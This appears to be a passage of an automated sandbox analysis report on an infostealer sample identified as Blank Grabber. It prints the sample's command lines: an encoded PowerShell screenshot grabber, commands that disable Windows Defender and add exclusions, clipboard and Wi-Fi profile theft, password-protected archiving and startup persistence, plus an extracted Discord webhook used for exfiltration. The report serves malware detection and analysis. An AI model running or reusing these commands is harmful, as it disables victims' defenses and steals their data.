CAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 1320, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'", ProcessId: 7924, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\sppawx.exe, ProcessId: 7860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\sppawx.exe, ProcessId: 7860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\sppawx.exe, ProcessId: 7860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7596, TargetFilename: C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7212, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *, ProcessId: 7036, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 8072, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 2624, ProcessName: cmd.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: sppawx.exe.7860.2.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}
              Source: sppawx.exeReversingLabs: Detection: 36%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256C901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,103_2_00007FF6256C901C
              Source: sppawx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: sppawx.exe, 00000002.00000002.1756530183.00007FFEED7A1000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.pdbhP source: powershell.exe, 00000044.00000002.1539735870.000001AF3CAE5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: sppawx.exe, 00000002.00000002.1750819292.00007FFEDCBDF000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.pdb source: powershell.exe, 00000044.00000002.1539735870.000001AF3CAE5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: sppawx.exe, 00000002.00000002.1756039277.00007FFEEAFC1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: sppawx.exe, 00000002.00000002.1755706204.00007FFEE6F27000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: sppawx.exe, 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: sppawx.exe, 00000002.00000002.1752922370.00007FFEDD7E2000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: sppawx.exe, 00000002.00000002.1755415210.00007FFEE44DC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: sppawx.exe, sppawx.exe, 00000002.00000002.1752922370.00007FFEDD7E2000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: sppawx.exe, 00000002.00000002.1756304635.00007FFEECEC1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: \vp.pdb* source: powershell.exe, 00000044.00000002.1603530749.000001AF5481E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: sppawx.exe, 00000002.00000002.1755415210.00007FFEE44DC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: sppawx.exe, 00000002.00000002.1755203682.00007FFEDE6A1000.00000040.00000001.01000000.0000000B.sdmp
